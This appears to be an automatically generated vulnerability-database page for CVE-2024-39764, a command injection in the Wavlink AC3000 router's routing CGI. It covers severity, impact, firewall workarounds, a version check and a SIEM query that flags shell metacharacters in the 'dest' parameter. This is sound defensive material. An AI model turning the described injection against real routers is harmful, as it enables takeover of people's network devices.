CVE-2024-39764 – This CVE describes multiple OS command injectio... (How to Fix)

Q: What is the severity of CVE-2024-39764?

CVE-2024-39764 has a CVSS score of 9.1 (CRITICAL). This CVE describes multiple OS command injection vulnerabilities in Wavlink AC3000 routers that allow authenticated attackers to execute arbitrary commands via specially crafted HTTP requests. The vulnerability affects the internet.cgi set_add_routing() functionality and can be exploited through the 'dest' POST parameter. This impacts organizations and individuals using vulnerable Wavlink AC3000 routers.

📋 TL;DR

This CVE describes multiple OS command injection vulnerabilities in Wavlink AC3000 routers that allow authenticated attackers to execute arbitrary commands via specially crafted HTTP requests. The vulnerability affects the internet.cgi set_add_routing() functionality and can be exploited through the 'dest' POST parameter. This impacts organizations and individuals using vulnerable Wavlink AC3000 routers.

💻 Affected Systems

Products:

Wavlink AC3000 M33A8

Versions: V5030.210505 and likely earlier versions

Operating Systems: Embedded Linux/RTOS

Default Config Vulnerable: ⚠️ Yes

Notes: Requires authenticated access to the web interface. Default credentials may increase risk if not changed.

📦 What is this software?

Wl Wn533a8 Firmware by Wavlink

View all CVEs affecting Wl Wn533a8 Firmware →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Complete compromise of the router allowing attackers to establish persistent access, pivot to internal networks, intercept traffic, or use the device as part of a botnet.

🟠

Likely Case

Attackers gaining administrative control of the router to modify configurations, intercept network traffic, or deploy malware to connected devices.

🟢

If Mitigated

Limited impact due to network segmentation, strong authentication controls, and restricted administrative access to the router interface.

🌐 Internet-Facing: HIGH

🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ✅ No

Weaponized: LIKELY

Unauthenticated Exploit: ✅ No

Complexity: LOW

Exploitation requires authenticated access but is straightforward once credentials are obtained. The vulnerability is in a CGI script accessible via HTTP.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Unknown

Vendor Advisory: Not available

Restart Required: Yes

Instructions:

1. Check Wavlink website for firmware updates. 2. Download latest firmware for AC3000. 3. Access router admin interface. 4. Navigate to firmware update section. 5. Upload and apply new firmware. 6. Reboot router after update.

🔧 Temporary Workarounds

Restrict Administrative Access

linux

Limit access to router admin interface to trusted IP addresses only

iptables -A INPUT -p tcp --dport 80 -s TRUSTED_IP -j ACCEPT
iptables -A INPUT -p tcp --dport 443 -s TRUSTED_IP -j ACCEPT
iptables -A INPUT -p tcp --dport 80 -j DROP
iptables -A INPUT -p tcp --dport 443 -j DROP

Change Default Credentials

all

Ensure strong, unique administrative credentials are set

🧯 If You Can't Patch

Segment the router on a dedicated VLAN with strict firewall rules
Implement network monitoring for unusual HTTP requests to the router admin interface

🔍 How to Verify

Check if Vulnerable:

Check router firmware version via admin interface. If version is V5030.210505 or earlier, assume vulnerable.

Check Version:

curl -s http://router-ip/status.cgi | grep firmware_version

Verify Fix Applied:

Verify firmware version has been updated to a version later than V5030.210505

📡 Detection & Monitoring

Log Indicators:

Unusual POST requests to internet.cgi with shell metacharacters in parameters
Multiple failed authentication attempts followed by successful login

Network Indicators:

HTTP requests containing shell commands in POST parameters
Outbound connections from router to unexpected external IPs

SIEM Query:

source="router_logs" AND (url="*internet.cgi*" AND (param="*dest=*;*" OR param="*dest=*|*" OR param="*dest=*&*"))

📊 Metadata

CVE ID: CVE-2024-39764

CVSS v3 Score: 9.1 (CRITICAL)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

CWE: CWE-77

EPSS Score: 1.42% exploit probability (80.3th percentile)

Published: January 14, 2025

Last Updated: November 3, 2025

🔗 References

https://talosintelligence.com/vulnerability_reports/TALOS-2024-2020 Exploit,Third Party Advisory
https://www.talosintelligence.com/vulnerability_reports/TALOS-2024-2020

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2024-39764, you might also want to check these: